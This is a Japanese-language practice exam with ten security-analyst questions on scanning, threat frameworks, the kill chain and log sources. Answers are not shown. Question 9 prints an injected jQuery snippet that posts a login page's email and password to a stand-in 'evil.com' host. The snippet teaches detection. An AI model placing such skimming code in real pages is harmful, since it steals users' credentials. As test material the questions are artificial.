「試験を終了する」ボタンを押すと、各問題の正答と解説を確認することができます。
1.
ある企業は、システムを評価するために新しい脆弱性スキャン ソフトウェアを導入しています。現在のネットワークは高度にセグメント化されており、ネットワーキング チームは固有のファイアウォール ルールの数を最小限に抑えたいと考えています。次のスキャン技術のうち、目的を達成するのに最も効率的なのはどれですか。
2.
脅威アクターの行動を伝達するために一般的に使用される 4 つのコンポーネントのフレームワークは次のうちどれですか。
3.
アナリストは、ヘッダーに追加の文字を含む HTTPS トラフィックを別の国の既知の悪意のある IP に送信する内部デバイスがあることに気付きました。アナリストが気づいたことを説明しているのは次のうちどれですか。
4.
ある組織の最高経営責任者は最近、パッチがリリースされてから約 45 日後に業界で新たな攻撃の悪用が発生していると聞きました。この組織を守るのに最も適しているのは次のうちどれですか。
5.
アナリストは、Web プロキシとファイアウォールで以前にブロックされていた IP への異常な送信接続を発見しました。さらに調査すると、設定されていたプロキシとファイアウォールのルールが、認識されないサービス アカウントによって削除されたようです。これはサイバー キル チェーンの次のどの部分を説明していますか。
6.
企業には※1のセキュリティ要件があります。クラウド スキャンが完了すると、セキュリティ アナリストは、いくつかの設定ミスが会社を危険にさらしているという報告を受け取りました。※2のクラウド スキャナーの出力があるとします。 セキュリティ要件を満たし、リスクを軽減するために、アナリストは次のうちどれを最初に更新することを推奨しますか。
※1
・パブリック IP なし
・すべてのデータは保存時に保護されている
・安全でないポート/プロトコルがない
※2

7.
ネットワーク アナリストは、WAN 接続の反対側にある 2 つの IP アドレス間のポート 1433 でトラフィックが長時間急増していることに気付きました。最も考えられる原因は次のうちどれですか。
8.
セキュリティ アナリストは、ネットワーク ルーティング上の異常を特定しようとしています。アナリストが目的を最も正確に達成するためにシェル スクリプトで使用できる関数は次のうちどれですか。
9.
ある会社のセキュリティ・アナリストが、ファイル完全性監視からのアラート(login.html ファイルのハッシュの不一致を示す)をレビューしています。そのコードを以前のバージョンのページのソースコードと比較した結果、アナリストは以下のコードスニペットが追加されていることを発見しました。アナリストが観察したアクティビティを最もよく説明しているものは次のうちどれですか。
$.ajax({
dataType: 'JSON',
url : 'https://evil.com/finisih.php?x=ZXZpbA==',
type: 'POST',
data: {
email: email%40domain.com,
password: password
}
...
10.
会社が所有および管理しているラップトップにマルウェアが存在する疑いがあります。同社は一元的なセキュリティ ログを実装しました。次のログ ソースのうち、マルウェア感染を確認できるものはどれですか。